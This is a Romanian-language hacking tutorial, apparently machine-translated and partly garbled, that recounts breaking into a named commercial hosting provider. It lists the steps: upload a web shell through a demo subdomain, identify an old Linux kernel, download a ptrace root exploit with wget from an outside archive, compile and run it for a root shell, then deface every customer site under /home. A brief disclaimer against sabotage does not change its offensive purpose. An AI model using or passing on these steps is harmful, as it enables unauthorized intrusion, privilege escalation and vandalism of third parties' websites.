Cum se descompun site-urile (pe exemple reale)

Deci, metoda script-kiddi + fantezie, sper că este ușor de înțeles, apoi continuați, următorul obiectiv pentru noi este o găzduire burgheză: www.primesource-hosting.com Pentru a o rupe, trebuia să vă înregistrați. Deci:






1) Înregistram subdomeniul demo.primesource-hosting.com
2) Descărcați Shell la ea ca în paragraful anterior
3) Ne uităm la drepturile noastre, firește că sunt scăzute
4) Am citit articole și ne gândim persistent
5) scrie uname a; în Shell și uimit de răspunsul! Versiunea kernel 2.4.18
6) Căutăm exploatări pentru această versiune și găsim ptrace / kmod și mytrace
7) Atunci este mai ușor, / tmp;
8) Completați exploatația: wget -O /tmp/mptrace.c packetstormsecurity.nl/0304-expoits/myptrace.c;






9) Mergeți la folderul cd / tmp;
10) Compilați exploatarea: gcc -o exploit myptrace.c;
11) Rulați-o. / exploit;
12) Așa că am deschis Shell pe portul 24876 cu rădăcina drepturilor (numai el a va fi acoperit după o zi), acum pur și simplu se conectează la acesta telnetom, vom găsi pagina principală în directorul / home / primesou / public_html / și înlocuirea acesteia, precum și în paragraful precedent.
13) Uitați-vă la directorul / home / folder și vedeți că toate folderele care sunt acolo sunt toate site-urile găzduite aici. Acum, mergeți la toate aceste dosare și defașați toate site-urile.

Deci, sper că cititorul va înțelege și să fie capabil să repete cel puțin nivelul de prima și a doua articole și mi-a dat, dar nu și în sabotaj scopuri, precum și pentru formare și asistență suplimentară pentru sistemul de compromis.

Asta-i tot, în concluzie, voi spune că toate aceste hacking-uri au oglinzi pe www.void.ru și pe rusproj.by.ru; Dacă cineva are întrebări, vă rugăm să contactați: [protejat prin e-mail]







Articole similare

Trimiteți-le prietenilor: